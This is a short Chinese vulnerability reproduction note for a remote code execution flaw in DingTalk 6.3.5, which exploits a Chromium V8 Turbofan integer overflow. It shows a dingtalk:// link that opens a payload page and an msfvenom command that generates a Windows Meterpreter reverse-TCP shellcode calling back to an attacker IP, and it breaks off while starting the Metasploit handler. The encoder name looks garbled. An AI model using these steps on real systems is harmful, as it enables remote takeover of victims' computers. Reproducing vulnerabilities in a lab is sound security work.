漏洞名称
某钉钉版本6.3.5RCE
漏洞描述- 具备获取查看web应用能力,且web站点通过http协议传输。
- 漏洞的利用就是通过HTTP协议进行访问构造的payload,从而达成远程RCE获取目标电脑权限
- 利用了Chromium v8引擎整数溢出漏洞(是V8优化编译器Turbofan在SimplifiedLowering阶段产生的一个整数溢出漏洞),V8是Chromium内核中的JavaScript引擎,负责对JavaScript代码进行解释优化与执行。
dingtalk://dingtalkclient/page/link?url=127.0.0.1/test.html&pc_slide=true
- 版本< 6.3.25-Release.2149108
https://www.aliyundrive.com/s/K68iEoCvd46
实验环境及准备双击exe文件,一路下一步安装。。
漏洞复现第一步 MSF生成shellcode
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=端口 -e x86/culprit -f csharp
第二步 MSF开启监听
use exploit/multi/hand